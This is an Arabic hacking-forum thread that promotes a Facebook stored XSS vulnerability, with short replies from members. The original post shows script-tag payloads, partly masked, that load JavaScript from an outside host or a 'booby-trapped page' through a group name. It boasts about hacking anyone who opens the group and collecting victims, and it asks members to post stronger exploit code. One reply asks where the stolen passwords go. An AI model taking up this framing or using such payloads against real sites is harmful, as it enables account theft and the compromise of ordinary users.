|
ثغرة ( Facebook XSS Vulnerability ) و شرحها http://www.maktoobblog.com/wp-conten...lam-coeur1.gif و اولا هذا شرح لاى ثغرة باسم XSS و هذا للناس المش عارفين ما هيا ثغرات XSS ( http://ar.wikipedia.org/wiki/%D8%A8%...A7%D9%82%D8%B9 ) موضوع النهاردة مميز جدااا و ثغرة لسا طازة http://www.dev-point.com/vb/imagize/smilies/1.gif , و تاريخ نزولها ( 2010-04-02 ) يعنى جديدة شوية http://www.dev-point.com/vb/imagize/smilies/1.gif المهم الثغرة عبارة عن تخترق اى حد من فيس بوك بمجرد دخول على جروب الانتا عملوا http://www.dev-point.com/vb/imagize/smilies/1.gif يعنى ممكن من هذة الثغرة تخترق هكر محترف لو ضغط على الجروب http://www.dev-point.com/vb/imagize/smilies/1.gif يعنى حاجة مميزة جدااا جدااا شوفوا الثغرة عبارة عن ( Facebook XSS Vulnerability ) و ثغرة عبارة عن فكرة حلوا و هيا حسب الفهمتوا من شرح الموجود فى ثغرة http://www.dev-point.com/vb/imagize/smilies/1.gif ان انا بعمل جروب باسم جافا سكربت ( يعنى مثلا : كود: <****** src=http://inj3ct0r.com></******> ) و هذة صور توضيح للفكرة : - http://img255.imageshack.us/img255/8472/97662321.jpg http://img195.imageshack.us/img195/5733/63048167.jpg طب اية الفكرة http://www.dev-point.com/vb/imagize/smilies/1.gif بكل اختصار انا فهمت ان فيس بوك يستخدم سكربت كثيرة يعنى ممكن ان تعمل اى امر تطبيق للجافا حتا لو امر ينفذ باتش او سيرفر http://www.dev-point.com/vb/imagize/smilies/1.gif يعنى شوف مدى الخطورة , لا و اية كمان ممكن تنشر جروب و تجمع ضحايا كلهم من فيس بوك .. http://3yoonh.jeeran.com/fwasel/51.gif هذة الثغرة http://inj3ct0r.com/exploits/11577 و على فكرة لو حد عايز يفهم الثغرة لوحدة علشان يتاكد من كلمى >ابد قراءة من هنا ( :::::::::: How to exploit this ) http://3yoonh.jeeran.com/fwasel/51.gif و طبعا بعد هذا ارجوا ان ثغرة تنال اعجبكم بس انا عايز من المختصين فى ( HTML or Java Script code ) ان ينزلوا كود لهذة ثغرة او احسن استغلال لهذة كود .. ياريت حد يضع كود مميز ,و يجربوا قبل ما يضع الكود http://www.dev-point.com/vb/imagize/smilies/1.gif هذا امنية http://www.dev-point.com/vb/imagize/smilies/159.gif ... و انا هساهم باول كود الموجود فى ثغرة http://www.dev-point.com/vb/imagize/smilies/1.gif ( كود: <****** src=رابط صفختك الملغومة></******> ) ... و فى نصيحة لاعضاء ديف بوينت المميز ( هيا : احسن و اكبر موقع ثغرات هوا هذا http://inj3ct0r.com :yipi: |
لا تنسى الرد + التقييم |
مافهمانين مهمةالتغرة |
الثغرة عبارة عن تخترق اى حد من فيس بوك بمجرد دخول على جروب |
شكرا لك أخي واصل إبداعك |
شكرا لك |
gl htil |
chno ka tgol |
بارك الله فيك |
مشكور اخي جاري التجريب بس ان مافهمت وين راح تلقى الباسوردات الخ |
رد: ثغرة ( Facebook XSS Vulnerability ) و شرحها شكرا جزيلا |
رد: ثغرة ( Facebook XSS Vulnerability ) و شرحها mafhémtsh |
| الساعة الآن 08:55 AM |
[ vBspiders.Com Network ]